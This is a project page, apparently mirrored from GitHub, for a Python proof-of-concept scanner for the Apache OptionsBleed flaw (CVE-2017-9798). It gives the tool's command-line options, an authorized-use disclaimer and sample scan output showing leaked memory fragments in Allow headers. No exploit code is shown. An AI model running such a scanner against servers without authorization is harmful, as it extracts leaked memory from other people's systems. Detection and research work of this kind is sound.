项目作者: brokensound77

项目描述 :
OptionsBleed (CVE-2017-9798) PoC / Scanner
高级语言: Python
项目地址: git://github.com/brokensound77/OptionsBleed-POC-Scanner.git
创建时间: 2017-09-27T03:28:22Z
项目社区:https://github.com/brokensound77/OptionsBleed-POC-Scanner

开源协议:MIT License

下载


OptionsBleed-POC-Scanner

OptionsBleed (CVE-2017-9798) PoC / Scanner

More information coming soon…

Disclaimer

This software has been created purely for the purposes of academic research and for the development of effective defensive techniques, and is not intended to be used to attack systems except where explicitly authorized. Project maintainers are not responsible or liable for misuse of the software. Use responsibly.

Usage

pip install -r requirements.txt

  1. usage: bleeder.py [-h] [-c COUNT] [-f {option,custom}] [-tc THREAD_COUNT] [-nv] [-ni] [-v] [-e] url
  2. positional arguments:
  3. url full URL (including http(s)) to be scanned
  4. optional arguments:
  5. -h, --help show this help message and exit
  6. -c COUNT, --count COUNT
  7. number of times to scan (default: 1000)
  8. -f {option,custom}, --force {option,custom}
  9. forces the scan to attempt using custom verb method
  10. OR OPTIONS (default: try OPTIONS THEN custom)
  11. -tc THREAD_COUNT, --thread-count THREAD_COUNT
  12. max concurrent thread count (default: 500)
  13. -nv, --no-verify does not verify ssl connection (may be necessary for
  14. self-signed certs)
  15. -ni, --no-ignore does NOT ignore ssl warnings (default: ignored)
  16. -v, --verbose prints all headers
  17. -e, --errors prints all errors

Simple Usage

  1. python bleeder.py "http://10.1.2.3" -c 50
  2. ::OptionsBleed (CVE-2017-9798) Scanner::
  3. [+] scanning http://10.1.2.3 to see if it bleeds!
  4. [+] checking OPTION method
  5. [+] allow headers detected in OPTION response
  6. [+] checking CUSTOM method
  7. [+] allow headers detected in CUSTOM response
  8. [+] scanning with OPTIONS method...
  9. [+] scanning with custom (PULL) method...
  10. [+] 50 responses captured
  11. [+] unique results:
  12. GET,HEAD,allow,HEAD,allow,HEAD,,HEAD,OPTIONS,POST,all,HEAD,
  13. GET,HEAD,allow,HEAD,,HEAD,OPTIONS,POST,all,HEAD,
  14. GET,HEAD,╚jφHU,HEAD,,HEAD,,HEAD,,HEAD,,HEAD,,HEAD,OPTIONS,POST,all,HEAD,,HEAD,,,
  15. GET,HEAD,allow,HEAD,allow,HEAD,,HEAD,OPTIONS,POST,all,HEAD,all,HEAD,
  16. GET,HEAD,allow,HEAD,OPTIONS,POST,all,HEAD,all,HEAD
  17. GET,HEAD,allow,HEAD,╚jφHU,HEAD,,HEAD,,HEAD,OPTIONS,POST,,HEAD,all,HEAD,,HEAD,
  18. GET,HEAD,allow,HEAD,OPTIONS,POST,all,HEAD
  19. GET,HEAD,allow,HEAD,,HEAD,OPTIONS,POST,all,HEAD,all,HEAD,
  20. GET,HEAD,allow,HEAD,allow,HEAD,OPTIONS,POST,all,HEAD
  21. GET,HEAD,allow,HEAD,╚jφHU,HEAD,,HEAD,,HEAD,,HEAD,,HEAD,,HEAD,OPTIONS,POST,all,HEAD,,HEAD,,,
  22. GET,HEAD,╚jφHU,HEAD,,HEAD,,HEAD,,HEAD,,HEAD,,HEAD,,HEAD,OPTIONS,POST,all,HEAD,,HEAD,,,
  23. GET,HEAD,allow,HEAD,allow,HEAD,╚jφHU,HEAD,,HEAD,,HEAD,OPTIONS,POST,,HEAD,all,HEAD,,HEAD,
  24. [+] scan complete!